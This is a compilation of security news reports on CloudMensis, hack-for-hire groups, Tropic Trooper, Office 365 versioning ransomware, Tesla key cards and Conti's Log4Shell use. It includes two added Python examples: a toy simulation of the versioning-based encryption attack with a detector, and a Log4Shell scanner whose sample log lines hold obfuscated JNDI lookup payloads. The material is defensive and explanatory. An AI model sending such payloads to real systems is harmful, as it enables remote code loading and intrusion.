
Experts Discover New CloudMensis Spyware Targeting Apple macOS Users


Cybersecurity researchers have disclosed previously undocumented spyware targeting Apple's macOS operating system. The malware, dubbed CloudMensis by Slovak cybersecurity firm ESET, is notable for relying exclusively on public cloud storage services, namely pCloud, Yandex Disk, and Dropbox, to receive attacker commands and to exfiltrate files.

"Its capabilities clearly show that the intent of its operators is to gather information from the victims' Macs by exfiltrating documents, keystrokes, and screen captures," ESET researcher Marc-Etienne M.Léveillé said in a published report.

CloudMensis, first spotted by ESET in April 2022, is written in Objective-C and built to run on both Intel and Apple silicon Macs. The initial infection vector and the identity of the targets are still unknown, but the malware's very limited distribution suggests it is being used in a carefully targeted operation against organisations of interest.

The attack chain ESET observed uses code execution and administrative privileges, obtained by a still-unknown means, to launch a first-stage payload, which in turn retrieves and runs a second-stage component hosted on pCloud. That second stage exfiltrates documents, screenshots, and email attachments, among other data.

The first-stage downloader also removes traces of Safari sandbox-escape and privilege-escalation exploits from 2017 that relied on four since-patched vulnerabilities, which suggests CloudMensis may have evaded detection for years. The implant additionally bypasses Transparency, Consent, and Control (TCC), the macOS mechanism that requires every application to obtain the user's consent before accessing files in Documents, Downloads, Desktop, iCloud Drive, and on network volumes.

It does so by exploiting another since-patched TCC bypass, CVE-2020-9934, disclosed in 2020. The backdoor can also list running processes, capture screenshots, enumerate files on removable storage, and run shell commands and other arbitrary payloads.

Metadata from the cloud storage accounts shows that the pCloud accounts were created on January 19, 2022, with compromises beginning on February 4 and peaking in March.

M.Léveillé said, "The general quality of the code and lack of obfuscation shows the authors may not be very familiar with Mac development and are not so advanced. Nonetheless, a lot of resources were put into making CloudMensis a powerful spying tool and a menace to potential targets."

Google Blocked Dozens of Domains Used by Hack-for-hire Groups


Google's Threat Analysis Group (TAG) published a blog post on Thursday detailing the activities of hack-for-hire groups in Russia, India, and the United Arab Emirates. More than 30 domains used by these groups have been added to Google's Safe Browsing blocklist, so that users are blocked from reaching them.

Hack-for-hire groups are sometimes confused with surveillance vendors. As Google explains, surveillance vendors typically supply the tooling and leave its operation to the end customer, whereas hack-for-hire groups carry out the attacks themselves. Several such groups have been exposed in recent years; Google's post focuses on three, believed to be based in India, Russia, and the United Arab Emirates.

Google has tracked the India-linked actor since 2012. Some of its members formerly worked for offensive security firms and now appear to work for Rebsec, a new company that openly advertises corporate espionage services. The group has been seen phishing credentials for AWS, Gmail, and government services accounts from healthcare, government, and telecom organisations in the Middle East.

The Russia-linked actor, tracked by others as Void Balaur, has targeted journalists, politicians, NGOs and non-profit organisations, and people who appear to be ordinary residents of Russia and neighbouring countries. Phishing was used in these attacks as well.

“After the target account was compromised, the attacker generally maintained persistence by granting an OAuth token to a legitimate email application like Thunderbird or generating an App Password to access the account via IMAP. Both OAuth tokens and App Passwords are revoked when a user changes their password,” explained Shane Huntley, director of Google’s Threat Analysis Group. 

This group also ran a public website advertising social media and email account hacking services. The UAE-based group mainly targets government, political, and educational organisations in North Africa and the Middle East. It too relies on phishing emails but, unlike many other groups, uses a custom phishing kit rather than an open source phishing framework.

“After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider. The attacker would then use a custom tool to download the mailbox contents via IMAP,” Huntley said. 

Google assesses that Mohammed Benabdellah, who was sued by Microsoft in 2014 over the development of the H-Worm (njRAT) malware, is associated with the group.

Cyberattack Struck Norway, Pro-Russian Hacker Group Fingered


According to Norwegian authorities, a cyberattack temporarily knocked public and private websites in Norway offline over the previous 24 hours.

Norwegian Prime Minister Jonas Gahr Støre said the attack caused no serious damage. The Norwegian National Security Authority (NSM) said the distributed denial-of-service (DDoS) attack targeted a secure national data network, disrupting online services for several hours.

NSM chief Sofie Nystrøm said the attacks appear to be the work of a criminal pro-Russian group, adding that they "create the sense that we are a piece in Europe's present political crisis."

According to Norwegian media, the country's ambassador to Moscow was summoned to the Russian Foreign Ministry on Wednesday over a protest about Russian supplies being denied transit through Norway to an Arctic Russian coal-mining settlement.

The settlement, Barentsburg, lies in the Svalbard archipelago, some 800 kilometres (500 miles) north of the Norwegian mainland. Because of the war in Ukraine, the European Union has imposed sanctions on a range of Russian goods.

Norway is not an EU member but aligns with EU policy on most issues. Under a 1920 treaty, Norway has sovereignty over Svalbard, but the other signatory countries retain the right to exploit its natural resources.

The attack on Norway came two days after a similar attack briefly took down government and private websites in Lithuania, for which a pro-Moscow hacking group claimed responsibility. That incident occurred a week after Russian authorities warned of retaliation for Lithuania blocking the transit of EU-sanctioned steel and ferrous metals across its territory to Russia's Kaliningrad exclave.

Chinese Hackers Disseminating SMS Bomber Tool with Hidden Malware


A threat cluster linked to the Tropic Trooper hacking group has been observed using previously undocumented malware written in the Nim language as part of a newly disclosed campaign.

The new loader, codenamed Nimbda, is "bundled with a Chinese language greyware 'SMS Bomber' tool that is most likely illegally circulated in the Chinese-speaking web," according to a report by Israeli cybersecurity firm Check Point. "Whoever crafted the Nim loader took special care to give it the same executable icon as the SMS Bomber that it drops and executes," the researchers said. "Therefore the entire bundle works as a trojanized binary."

SMS Bomber, as the name implies, lets a user enter a phone number (not their own) and flood that device with messages, potentially rendering it unusable in a denial-of-service (DoS) attack.

That the binary works both as an SMS Bomber and as a backdoor shows the attacks are not merely aimed at users of the tool, a "somewhat unorthodox target", but are also highly targeted.

Tropic Trooper, also known as Earth Centaur, KeyBoy, and Pirate Panda, has a history of attacking targets in Taiwan, Hong Kong, and the Philippines, especially in the government, healthcare, transportation, and high-tech industries. 

Trend Micro last year described the Chinese-speaking collective as particularly sophisticated and well-equipped, noting the group's ability to evolve its TTPs to stay under the radar and its reliance on a broad range of custom tools to compromise its targets.

The attack chain documented by Check Point begins with the trojanized SMS Bomber tool, i.e. the Nimbda loader, which runs an embedded executable (in this case the legitimate SMS Bomber payload) while injecting a second piece of shellcode into a notepad.exe process. This kicks off a three-tier infection process: first, a next-stage payload is downloaded from an obfuscated IP address stored in a markdown file published in an attacker-controlled GitHub or Gitee repository. The retrieved binary is an upgraded version of the Yahoyah trojan, which collects information about wireless networks in the victim machine's vicinity and other system metadata and sends it to a command-and-control (C2) server. Yahoyah in turn acts as the conduit for the final-stage malware, which is downloaded from the C2 server in the form of an image. The steganographically encoded payload is a backdoor known as TClient, which the group has used in past attacks.

The researchers concluded, "The observed activity cluster paints a picture of a focused, determined actor with a clear goal in mind."

"Usually, when third-party benign (or benign-appearing) tools are hand-picked to be inserted into an infection chain, they are chosen to be the least conspicuous possible; the choice of an 'SMS Bomber' tool for this purpose is unsettling, and tells a whole story the moment one dares to extrapolate a motive and an intended victim."

Researchers Alert About Ransomware Attacks Targeting Microsoft Cloud ‘Versioning’ Feature

Researchers have identified functionality in Office 365 that lets attackers hold files stored in SharePoint Online and OneDrive for ransom. When they reported it, Microsoft responded that the system was working as designed and that this is a feature rather than a vulnerability.

Files stored and edited in the cloud have long been assumed to be resistant to encryption-based extortion: autosave and versioning should provide enough of a backup. Researchers at Proofpoint have shown that this assumption is false. They wrote, “Our research focused on… SharePoint Online and OneDrive… and shows that ransomware actors can now target organizations’ data in the cloud and launch attacks on cloud infrastructure.”

Both techniques rely on the Microsoft versioning feature, which lets a user set the maximum number of older versions kept for each file; versions beyond that limit are, by design, difficult if not impossible to recover. The first technique is more theoretical than practical; the second is clearly practical. By default, up to 500 versions of a document are retained, so in the first technique the attacker simply modifies and encrypts the file 501 times.

Each change need only be large enough to make the system save a new (encrypted) version. Once the process completes, every retained version is encrypted and the file cannot be recovered without the decryption key. This attack is theoretical: in practice it would be noisy and easy to detect. The second technique is more practical: use the built-in, user-controlled versioning setting to reduce the number of stored versions to one.

Every SharePoint and OneDrive document library has a user-configurable setting for the number of versions to keep, found under the list settings of each library. Setting the limit to zero does not help an attacker, because it does not remove the older versions, which the user can still restore.

With the limit set to one, the file need only be encrypted twice before the user loses access to its contents. If the data was exfiltrated before encryption, the attacker can also mount a second extortion attempt. The full attack chain is: initial access via compromised or hijacked user identities, account takeover and discovery, versioning reduction, file exfiltration and encryption, and extortion.
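To make the two overwrite counts above concrete (501 at the default limit, 2 after lowering the limit to 1) and to show what a defender can watch for, here is a small Python model of a version-limited document library. It is an added example, not Proofpoint's or Microsoft's code. The retention rule it assumes (the current version plus the configured number of prior versions) is the one that reproduces the numbers in the text; the cipher is a toy stand-in for real ransomware encryption; and the file content, the event log and the `detect_limit_abuse` heuristic are constructed for illustration.

```python
"""Toy model of a SharePoint/OneDrive document library with a version limit.
Added example, not Proofpoint's or Microsoft's code.  Model assumption: a
library keeps the current version plus `version_limit` prior versions, the
rule that reproduces the two overwrite counts in the text (501 and 2)."""
from __future__ import annotations

import hashlib
from collections import deque

DEFAULT_VERSION_LIMIT = 500  # default major-version limit cited in the text


def toy_encrypt(data: bytes, key: bytes) -> bytes:
    """Toy XOR keystream cipher, for illustration only; not ransomware crypto."""
    stream = b"".join(hashlib.sha256(key + i.to_bytes(8, "big")).digest()
                      for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))


class DocumentLibrary:
    def __init__(self, version_limit: int = DEFAULT_VERSION_LIMIT) -> None:
        self.version_limit = version_limit
        self._versions: dict[str, deque[bytes]] = {}
        self.events: list[tuple[str, str]] = []  # (event, detail) audit trail

    def set_version_limit(self, limit: int) -> None:
        # The text notes that 0 does not prune existing versions, so it is of
        # no use to the attacker and is rejected in this model.
        if limit < 1:
            raise ValueError("limit must be >= 1")
        if limit < self.version_limit:
            self.events.append(("limit_lowered", str(limit)))
        self.version_limit = limit

    def save(self, name: str, content: bytes) -> None:
        versions = self._versions.setdefault(name, deque())
        versions.append(content)
        self.events.append(("write", name))
        # Keep the current version plus `version_limit` prior ones; anything
        # older is pruned and is no longer recoverable by the user.
        while len(versions) > self.version_limit + 1:
            versions.popleft()

    def history(self, name: str) -> list[bytes]:
        return list(self._versions.get(name, ()))


def plaintext_recoverable(lib: DocumentLibrary, name: str, original: bytes) -> bool:
    """Victim-side check: is the original plaintext still in version history?"""
    return original in lib.history(name)


def encrypt_in_place(lib: DocumentLibrary, name: str, key: bytes, rounds: int) -> None:
    """Attacker action: re-encrypt the current content `rounds` times; every
    overwrite differs, so each one creates (and may prune) a version."""
    for i in range(rounds):
        current = lib.history(name)[-1]
        lib.save(name, toy_encrypt(current, key + i.to_bytes(2, "big")))


def detect_limit_abuse(lib: DocumentLibrary) -> list[str]:
    """Heuristic: after a limit reduction, flag any file overwritten more than
    new_limit times, since its pre-reduction versions have been pruned."""
    flagged: list[str] = []
    new_limit, writes = None, {}
    for event, detail in lib.events:
        if event == "limit_lowered":
            new_limit, writes = int(detail), {}
        elif event == "write" and new_limit is not None:
            writes[detail] = writes.get(detail, 0) + 1
            if writes[detail] > new_limit and detail not in flagged:
                flagged.append(detail)
    return flagged


def run_scenarios() -> dict[str, object]:
    """Both variants from the text against one constructed file."""
    name, key = "minutes.docx", b"attacker-key"
    original = b"Q3 board minutes (constructed sample content)"
    out: dict[str, object] = {}

    loud = DocumentLibrary()  # default limit of 500: 501 overwrites needed
    loud.save(name, original)
    encrypt_in_place(loud, name, key, DEFAULT_VERSION_LIMIT)
    out["after_500_recoverable"] = plaintext_recoverable(loud, name, original)
    encrypt_in_place(loud, name, key, 1)
    out["after_501_recoverable"] = plaintext_recoverable(loud, name, original)
    out["loud_flagged"] = detect_limit_abuse(loud)

    quiet = DocumentLibrary()  # lower the limit first: only 2 overwrites
    quiet.save(name, original)
    quiet.set_version_limit(1)
    out["quiet_overwrites"] = quiet.version_limit + 1
    encrypt_in_place(quiet, name, key, quiet.version_limit + 1)
    out["quiet_recoverable"] = plaintext_recoverable(quiet, name, original)
    out["quiet_flagged"] = detect_limit_abuse(quiet)
    return out
```

Running `run_scenarios()` shows the original plaintext surviving 500 overwrites at the default limit and vanishing on the 501st, while the quiet variant destroys it in two. The heuristic flags only the quiet case, because a limit reduction followed by more than `new_limit` edits to the same file is exactly the sequence that erases a file's pre-reduction history; the loud variant has to be caught by write volume instead.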

If the file owner keeps a local copy, the impact is limited; the attacker would then have to compromise both the endpoint and the cloud account. Proofpoint followed Microsoft's disclosure process and reported the issue to Microsoft before publishing.

Microsoft responded that, first, the versioning settings work as intended, and, second, older versions of files can potentially be retrieved and restored for a further 14 days with the help of Microsoft Support.

“However,” write the researchers, “Proofpoint attempted to retrieve and restore old versions through this process (i.e., with Microsoft Support) and was not successful. Secondly, even if the versioning settings configuration workflow is as intended, Proofpoint has shown that it can be abused by attackers towards cloud ransomware aims.”

The conclusion, then, is straightforward: do not assume that files stored and edited in the cloud are immune to extortion. Ransomware mitigation procedures must still be in place.

Researcher Demonstrated How Tesla Key Card Feature Can be Exploited to Steal Cars


A researcher has shown how a Tesla key card feature introduced last year can be abused to enrol an unauthorised key that lets an attacker unlock and start the vehicle.

The research was conducted by Martin Herfurt, an Austria-based member of the Trifinite research group, which specialises in Bluetooth security. Herfurt focused on changes Tesla made to key card access in August 2021, which removed the need for drivers to place the key card on the centre console after using it to unlock the car.

He found that when a Tesla is unlocked via NFC with the key card, there is a 130-second window in which an attacker within Bluetooth range of the vehicle can add their own key. The attack abuses Tesla's VCSEC protocol, which handles communication between the car, the phone app, and the key fob.

Findings by the researcher: 

During such an attack, the infotainment system does not warn the victim that a new key has been added. Herfurt tested the attack on the Tesla Model 3 and Model Y but believes it should also work on the newer Model S and Model X. At the recent Pwn2Own 2022 contest, hackers earned $75,000 for an attack on Tesla's infotainment system. Herfurt had intended to demonstrate his attack at Pwn2Own, but relay attacks were not permitted.

In fact, he said he had identified the authorisation timer attack vector in September 2021 but had saved it for Pwn2Own. He did not report his latest findings to Tesla before publishing them, because he believed the company was already aware of the problem. After his disclosure, he received confirmation from others who had reported a very similar issue to Tesla months earlier that Tesla knew about the vulnerability.

According to Herfurt, Tesla recommends the PIN2Drive feature, which requires the driver to enter a PIN before the car will drive off, but he published a video last week showing how an attacker could bypass PIN2Drive. Tesla has not yet responded to a request for comment.

Herfurt is developing TeslaKee, a smartphone app intended to protect Tesla vehicles from these kinds of relay attacks. In May, he demonstrated another way to steal a Tesla: two Raspberry Pi devices were used to relay the radio signal between the Phone Key and the car over a considerable distance.

Iranian Hackers Behind Cox Media Group Ransomware Attack


Iranian hackers were behind the ransomware attack that disrupted the IT systems and live streams of Cox Media Group radio and TV stations earlier this year, The Record reports.

The attack was carried out by a threat actor tracked as DEV-0270, which has been linked to several intrusions at US organisations this year that ended in ransomware deployment. Although the Cox Media Group intrusion was discovered on June 3, when the attackers encrypted some internal servers, the group had breached the company's internal network and been hiding inside it since mid-May.

Not all Cox Media Group radio and television stations were affected, but some lost the ability to stream live feeds on their websites. Initially, Cox Media Group tried to downplay the incident.

Local reporters who posted about the ransomware attack on Twitter were reprimanded and made to delete their posts. Four months later, in October, the company finally confirmed the incident, without disclosing any details about the Iranian hackers.

The revelation comes less than a month after the US Department of Justice in November charged two Iranian nationals with various hacking-related offences, one of which was compromising a US media company in order to spread disinformation about the legitimacy of the 2020 US presidential election through its websites.

That company was later confirmed to be Lee Enterprises, owner of the Buffalo News, the Arizona Daily Star, and the Omaha World-Herald. According to a Microsoft threat intelligence analysis, DEV-0270 has previously conducted both intelligence-collection operations and financially motivated attacks, which obscures the true motive behind the Cox ransomware attack.

The tactic of deploying ransomware on the networks of large organisations was first observed in late 2016 from Iranian hackers, namely the SamSam group. Their approach of targeting large businesses rather than end-users was later adopted by most ransomware actors and is now known as "big-game hunting."

Since then, most ransomware attacks have been attributed to Russia-based groups, but in recent years some incidents have also been linked to members of state-sponsored espionage groups in Iran, China, and North Korea.

Those groups deployed ransomware on some victims' networks either to monetise compromised organisations that had no intelligence value, or to disguise intelligence collection as a generic ransomware incident that would not prompt a deeper investigation.

Cox Media Group spokespeople did not respond to requests for comment on the intrusion in May and June.

Conti Ransomware Exploits Log4j Flaw to Hack VMware vCenter Servers


The Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines. The group wasted no time adopting the new attack vector, becoming the first top-tier operation observed exploiting the Log4j flaw.

A proof-of-concept (PoC) exploit for CVE-2021-44228, better known as Log4Shell, was published on December 9. A day later, numerous actors began scanning the internet for vulnerable systems. Cryptocurrency miners, botnets, and a new ransomware strain called Khonsari were among the first to exploit the flaw.

By December 15, state-backed hackers and initial access brokers, who sell network access to ransomware gangs, had joined the list of actors using Log4Shell. Conti, one of today's largest and most prolific ransomware groups, with dozens of full-time members, appears to have taken an early interest in Log4Shell, discussing it as a potential attack vector on Sunday, December 12.

The group began looking for fresh victims the next day, with the aim of moving laterally to VMware vCenter servers, according to Advanced Intelligence (AdvIntel), a cybercrime and adversarial disruption firm. Log4Shell affects dozens of vendors, who have rushed to patch their products or publish workarounds and mitigations for customers. VMware is one of them, with 40 products listed as vulnerable.

While VMware has published mitigations or fixes, a patch for the affected vCenter versions had not yet been released at the time of writing. Although vCenter servers are not normally exposed to the internet, there are scenarios in which an attacker can still exploit the flaw.

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – VMware

Log4Shell to move laterally 

"This is the first time this vulnerability entered the radar of a major ransomware group," AdvIntel said in a report shared with BleepingComputer.

“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” - AdvIntel 

While most defenders are focused on stopping Log4Shell attacks against internet-facing systems, the Conti operation shows how the vulnerability can be used against internal systems that are less well protected.

According to the researchers, Conti affiliates had already compromised the target networks and then exploited vulnerable Log4j instances to reach vCenter servers. In other words, Conti used a different initial access vector (RDP, VPN, email phishing) to get into the network and is now using Log4Shell to move laterally within it.
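AdvIntel's point is that the vulnerable Log4j instances Conti abused sat behind the perimeter, so detection has to run over internal web-server and vCenter access logs as well as edge logs. The Python script below, added here as an example and not code from AdvIntel, VMware or BleepingComputer, de-obfuscates and flags Log4Shell lookup strings, including the nested `${lower:...}`, `${::-...}` and URL-encoded forms that defeat a plain search for `${jndi:`. The sample log lines are constructed; the vCenter SSO path and the X-Forwarded-For field in them are an assumption about where an attacker would place the payload, not something the article states.

```python
"""Flag Log4Shell (CVE-2021-44228) lookup strings in log lines, including the
nested-lookup obfuscations that defeat a naive search for '${jndi:'.
Added example; not code from AdvIntel, VMware or BleepingComputer."""
from __future__ import annotations

import re
from urllib.parse import unquote

# An innermost lookup: ${...} whose body contains no further '$' or braces.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup after de-obfuscation; group 1 is the scheme (ldap, rmi, dns...).
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Expand one innermost lookup the way Log4j 2 would, for the handful of
    lookups attackers use to hide the string 'jndi'."""
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        # ${env:NOPE:-j}, ${sys:x:-j}, ${::-j}: the lookup fails and Log4j
        # substitutes the default value that follows ':-'.
        return body.split(":-", 1)[1]
    return match.group(0)  # a genuine lookup such as ${jndi:...}: keep it


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo (double) URL encoding and nested lookups until the text is stable."""
    for _ in range(2):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        expanded = INNER_LOOKUP.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the lowercased JNDI schemes found in one log line ([] if none)."""
    return [m.group(1).lower() for m in JNDI.finditer(normalize(line))]


def scan(lines: list[str]) -> list[tuple[int, str]]:
    """Scan log lines; return (line_number, scheme) for every hit."""
    return [(n, scheme) for n, line in enumerate(lines, 1)
            for scheme in find_jndi_lookups(line)]


# Constructed access-log lines (not real traffic).  The vCenter SSO path and the
# X-Forwarded-For value (xff) are assumed here as the request fields an
# attacker would stuff; the detection itself is field-agnostic.
SAMPLE_LOG = [
    '10.0.0.7 - - [13/Dec/2021:10:01:12] "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 200 xff="-"',
    '10.0.0.9 - - [13/Dec/2021:10:01:15] "GET /websso/SAML2/SSO/vsphere.local HTTP/1.1" 302 xff="${jndi:ldap://10.0.0.9:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:16] "GET / HTTP/1.1" 200 xff="${${lower:j}${upper:n}di:${lower:rmi}://10.0.0.9:1099/b}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:17] "GET / HTTP/1.1" 200 xff="${${env:NOPE:-j}${::-n}${::-d}${::-i}:dns://10.0.0.9/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:18] "GET /%24%7Bjndi%3Aldaps%3A%2F%2F10.0.0.9%2Fd%7D HTTP/1.1" 404 xff="-"',
    '10.0.0.3 - - [13/Dec/2021:10:02:00] "GET /ui/login HTTP/1.1" 200 xff="-"',
]

if __name__ == "__main__":
    for line_no, scheme in scan(SAMPLE_LOG):
        print(f"line {line_no}: Log4Shell lookup via {scheme}")
```

Point `scan()` at real lines from internal hosts and treat any hit as an exploitation attempt rather than noise; the reported scheme tells you whether the callback was LDAP or RMI (class loading) or DNS-only, which is often just a probe confirming the host is vulnerable.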

Conti, successor to the notorious Ryuk ransomware, is a Russian-speaking group that has been in the ransomware business for a long time. It has carried out hundreds of attacks: its data leak site alone lists over 600 victim companies that did not pay a ransom, on top of the firms that paid to have their data decrypted. According to AdvIntel, the group has extorted more than $150 million from its victims in the last six months.